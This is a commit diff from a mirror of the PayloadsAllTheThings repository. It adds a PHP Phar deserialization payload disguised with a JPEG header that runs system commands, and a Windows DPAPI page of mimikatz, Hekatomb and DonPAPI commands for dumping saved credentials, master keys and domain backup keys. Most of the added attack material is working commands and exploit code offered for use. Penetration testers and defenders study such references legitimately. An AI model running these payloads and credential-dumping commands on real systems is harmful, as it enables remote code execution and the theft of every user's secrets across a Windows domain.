mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
DPAPI - Data Protection API
This commit is contained in:
parent
6b76c452a7
commit
2d30e22121
@ -33,6 +33,7 @@
|
|||||||
* [InQL - A Burp Extension for GraphQL Security Testing](https://github.com/doyensec/inql)
|
* [InQL - A Burp Extension for GraphQL Security Testing](https://github.com/doyensec/inql)
|
||||||
* [Insomnia - Cross-platform HTTP and GraphQL Client](https://insomnia.rest/)
|
* [Insomnia - Cross-platform HTTP and GraphQL Client](https://insomnia.rest/)
|
||||||
* [AutoGraphql + introspection](https://graphql-dashboard.herokuapp.com/)
|
* [AutoGraphql + introspection](https://graphql-dashboard.herokuapp.com/)
|
||||||
|
* [CrackQL - A GraphQL password brute-force and fuzzing utility.](https://github.com/nicholasaleks/CrackQL)
|
||||||
|
|
||||||
## Exploit
|
## Exploit
|
||||||
|
|
||||||
|
@ -119,7 +119,7 @@ a:2:{s:10:"admin_hash";N;s:4:"hmac";R:2;}
|
|||||||
|
|
||||||
## Finding and using gadgets
|
## Finding and using gadgets
|
||||||
|
|
||||||
Also called "PHP POP Chains", they can be used to gain RCE on the system.
|
Also called `"PHP POP Chains"`, they can be used to gain RCE on the system.
|
||||||
|
|
||||||
[PHPGGC](https://github.com/ambionics/phpggc) is a tool built to generate the payload based on several frameworks:
|
[PHPGGC](https://github.com/ambionics/phpggc) is a tool built to generate the payload based on several frameworks:
|
||||||
|
|
||||||
@ -141,13 +141,13 @@ Using `phar://` wrapper, one can trigger a deserialization on the specified file
|
|||||||
|
|
||||||
A valid PHAR includes four elements:
|
A valid PHAR includes four elements:
|
||||||
|
|
||||||
1. Stub
|
1. **Stub**: The stub is a chunk of PHP code which is executed when the file is accessed in an executable context. At a minimum, the stub must contain `__HALT_COMPILER();` at its conclusion. Otherwise, there are no restrictions on the contents of a Phar stub.
|
||||||
2. Manifest
|
2. **Manifest**: Contains metadata about the archive and its contents.
|
||||||
3. File Contents
|
3. **File Contents**: Contains the actual files in the archive.
|
||||||
4. Signature
|
4. **Signature**(optional): For verifying archive integrity.
|
||||||
|
|
||||||
Example of a Phar creation in order to exploit a custom `PDFGenerator`.
|
|
||||||
|
|
||||||
|
* Example of a Phar creation in order to exploit a custom `PDFGenerator`.
|
||||||
```php
|
```php
|
||||||
<?php
|
<?php
|
||||||
class PDFGenerator { }
|
class PDFGenerator { }
|
||||||
@ -178,6 +178,32 @@ $poc->stopBuffering();
|
|||||||
?>
|
?>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
* Example of a Phar creation with a `JPEG` magic byte header since there is no restriction on the content of stub.
|
||||||
|
```php
|
||||||
|
<?php
|
||||||
|
class AnyClass {
|
||||||
|
public $data = null;
|
||||||
|
public function __construct($data) {
|
||||||
|
$this->data = $data;
|
||||||
|
}
|
||||||
|
|
||||||
|
function __destruct() {
|
||||||
|
system($this->data);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// create new Phar
|
||||||
|
$phar = new Phar('test.phar');
|
||||||
|
$phar->startBuffering();
|
||||||
|
$phar->addFromString('test.txt', 'text');
|
||||||
|
$phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");
|
||||||
|
|
||||||
|
// add object of any class as meta data
|
||||||
|
$object = new AnyClass('whoami');
|
||||||
|
$phar->setMetadata($object);
|
||||||
|
$phar->stopBuffering();
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Real world examples
|
## Real world examples
|
||||||
|
|
||||||
@ -200,3 +226,4 @@ $poc->stopBuffering();
|
|||||||
* [Rusty Joomla RCE Unserialize overflow](https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41)
|
* [Rusty Joomla RCE Unserialize overflow](https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41)
|
||||||
* [PHP Pop Chains - Achieving RCE with POP chain exploits. - Vickie Li - September 3, 2020](https://vkili.github.io/blog/insecure%20deserialization/pop-chains/)
|
* [PHP Pop Chains - Achieving RCE with POP chain exploits. - Vickie Li - September 3, 2020](https://vkili.github.io/blog/insecure%20deserialization/pop-chains/)
|
||||||
* [How to exploit the PHAR Deserialization Vulnerability - Alexandru Postolache - May 29, 2020](https://pentest-tools.com/blog/exploit-phar-deserialization-vulnerability/)
|
* [How to exploit the PHAR Deserialization Vulnerability - Alexandru Postolache - May 29, 2020](https://pentest-tools.com/blog/exploit-phar-deserialization-vulnerability/)
|
||||||
|
* [phar:// deserialization - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-inclusion/phar-deserialization)
|
86
Methodology and Resources/Windows - DPAPI.md
Normal file
86
Methodology and Resources/Windows - DPAPI.md
Normal file
@ -0,0 +1,86 @@
|
|||||||
|
# Windows - DPAPI
|
||||||
|
|
||||||
|
> On Windows, credentials saved in the Windows Credentials Manager are encrypted using Microsoft's Data Protection API and stored as "blob" files in user AppData folder.
|
||||||
|
|
||||||
|
## Summary
|
||||||
|
|
||||||
|
* [Data Protection API](#data-protection-api)
|
||||||
|
* [List Credential Files](#list-credential-files)
|
||||||
|
* [Mimikatz - Credential Manager & DPAPI](#mimikatz---credential-manager--dpapi)
|
||||||
|
* [Hekatomb - Steal all credentials on domain](#hekatomb---steal-all-credentials-on-domain)
|
||||||
|
* [DonPAPI - Dumping DPAPI credz remotely](#donpapi---dumping-dpapi-credz-remotely)
|
||||||
|
|
||||||
|
|
||||||
|
## Data Protection API
|
||||||
|
|
||||||
|
* Outside of a domain: the user's `password hash` is used to encrypt these "blobs".
|
||||||
|
* Inside a domain: the `domain controller's master key` is used to encrypt these blobs.
|
||||||
|
|
||||||
|
With the extracted private key of the domain controller, it is possible to decrypt all the blobs, and therefore to recover all the secrets recorded in the Windows identification manager of all the work
|
||||||
|
stations in the domain.
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
vaultcmd /list
|
||||||
|
|
||||||
|
VaultCmd /listcreds:<namevault>|<guidvault> /all
|
||||||
|
vaultcmd /listcreds:"Windows Credentials" /all
|
||||||
|
```
|
||||||
|
|
||||||
|
### List Credential Files
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
dir /a:h C:\Users\username\AppData\Local\Microsoft\Credentials\
|
||||||
|
dir /a:h C:\Users\username\AppData\Roaming\Microsoft\Credentials\
|
||||||
|
|
||||||
|
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
|
||||||
|
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### Mimikatz - Credential Manager & DPAPI
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# check the folder to find credentials
|
||||||
|
dir C:\Users\<username>\AppData\Local\Microsoft\Credentials\*
|
||||||
|
|
||||||
|
# check the file with mimikatz
|
||||||
|
mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0
|
||||||
|
# find master key
|
||||||
|
mimikatz !sekurlsa::dpapi
|
||||||
|
# use master key
|
||||||
|
mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 /masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b
|
||||||
|
|
||||||
|
# find and export backup keys
|
||||||
|
lsadump::backupkeys /system:dc01.lab.local /export
|
||||||
|
# use backup keys
|
||||||
|
dpapi::masterkey /in:"C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Protect\S-1-5-21-2552734371-813931464-1050690807-1106\3e90dd9e-f901-40a1-b691-84d7f647b8fe" /pvk:ntds_capi_0_d2685b31-402d-493b-8d12-5fe48ee26f5a.pvk
|
||||||
|
```
|
||||||
|
|
||||||
|
### Hekatomb - Steal all credentials on domain
|
||||||
|
|
||||||
|
> [Processus-Thief/Hekatomb](https://github.com/Processus-Thief/HEKATOMB) is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers. Finally, it will extract domain controller private key through RPC uses it to decrypt all credentials.
|
||||||
|
|
||||||
|
```python
|
||||||
|
pip3 install hekatomb
|
||||||
|
hekatomb -hashes :ed0052e5a66b1c8e942cc9481a50d56 DOMAIN.local/administrator@10.0.0.1 -debug -dnstcp
|
||||||
|
```
|
||||||
|
|
||||||
|
![Data in memory](https://github.com/Processus-Thief/HEKATOMB/raw/main/.assets/github1.png)
|
||||||
|
|
||||||
|
### DonPAPI - Dumping DPAPI credz remotely
|
||||||
|
|
||||||
|
* [login-securite/DonPAPI](https://github.com/login-securite/DonPAPI)
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
DonPAPI.py domain/user:passw0rd@target
|
||||||
|
DonPAPI.py --hashes <LM>:<NT> domain/user@target
|
||||||
|
|
||||||
|
# using domain backup key
|
||||||
|
dpapi.py backupkeys --export -t domain/user:passw0rd@target_dc_ip
|
||||||
|
python DonPAPI.py -pvk domain_backupkey.pvk domain/user:passw0rd@domain_network_list
|
||||||
|
```
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [DPAPI - Extracting Passwords - HackTricks](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords)
|
||||||
|
* [DON PAPI, OU L’ART D’ALLER PLUS LOIN QUE LE DOMAIN ADMIN - LoginSecurité - CORTO GUEGUEN - 4 MARS 2022](https://www.login-securite.com/2022/03/04/don-papi-ou-lart-daller-plus-loin-que-le-avec-dpapi/)
|
@ -14,7 +14,6 @@
|
|||||||
* [Chrome Cookies & Credential](#chrome-cookies--credential)
|
* [Chrome Cookies & Credential](#chrome-cookies--credential)
|
||||||
* [Task Scheduled credentials](#task-scheduled-credentials)
|
* [Task Scheduled credentials](#task-scheduled-credentials)
|
||||||
* [Vault](#vault)
|
* [Vault](#vault)
|
||||||
* [Hekatomb - Steal all credentials on domain](#hekatomb---Steal-all-credentials-on-domain)
|
|
||||||
* [Mimikatz - Commands list](#mimikatz---commands-list)
|
* [Mimikatz - Commands list](#mimikatz---commands-list)
|
||||||
* [Mimikatz - Powershell version](#mimikatz---powershell-version)
|
* [Mimikatz - Powershell version](#mimikatz---powershell-version)
|
||||||
* [References](#references)
|
* [References](#references)
|
||||||
@ -236,24 +235,6 @@ Attributes : 0
|
|||||||
vault::cred /in:C:\Users\demo\AppData\Local\Microsoft\Vault\"
|
vault::cred /in:C:\Users\demo\AppData\Local\Microsoft\Vault\"
|
||||||
```
|
```
|
||||||
|
|
||||||
### Hekatomb - Steal all credentials on domain
|
|
||||||
|
|
||||||
> Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations.
|
|
||||||
|
|
||||||
> Then it will download all DPAPI blob of all users from all computers.
|
|
||||||
|
|
||||||
> Finally, it will extract domain controller private key through RPC uses it to decrypt all credentials.
|
|
||||||
|
|
||||||
```python
|
|
||||||
pip3 install hekatomb
|
|
||||||
hekatomb -hashes :ed0052e5a66b1c8e942cc9481a50d56 DOMAIN.local/administrator@10.0.0.1 -debug -dnstcp
|
|
||||||
```
|
|
||||||
|
|
||||||
<a href="https://github.com/Processus-Thief/HEKATOMB">https://github.com/Processus-Thief/HEKATOMB</a>
|
|
||||||
|
|
||||||
![Data in memory](https://github.com/Processus-Thief/HEKATOMB/raw/main/.assets/github1.png)
|
|
||||||
|
|
||||||
|
|
||||||
## Mimikatz - Commands list
|
## Mimikatz - Commands list
|
||||||
|
|
||||||
| Command |Definition|
|
| Command |Definition|
|
||||||
|
@ -205,3 +205,4 @@ Upload the XML file to `$JETTY_BASE/webapps/`
|
|||||||
* [File Upload - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-upload)
|
* [File Upload - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-upload)
|
||||||
* [Injection points in popular image formats - Daniel Kalinowski - Nov 8, 2019](https://blog.isec.pl/injection-points-in-popular-image-formats/)
|
* [Injection points in popular image formats - Daniel Kalinowski - Nov 8, 2019](https://blog.isec.pl/injection-points-in-popular-image-formats/)
|
||||||
* [A tip for getting RCE in Jetty apps with just one XML file! - Aug 4, 2022 - PT SWARM / @ptswarm](https://twitter.com/ptswarm/status/1555184661751648256/)
|
* [A tip for getting RCE in Jetty apps with just one XML file! - Aug 4, 2022 - PT SWARM / @ptswarm](https://twitter.com/ptswarm/status/1555184661751648256/)
|
||||||
|
* [Jetty Features for Hacking Web Apps - September 15, 2022 - Mikhail Klyuchnikov](https://swarm.ptsecurity.com/jetty-features-for-hacking-web-apps/)
|
||||||
|
Loading…
Reference in New Issue
Block a user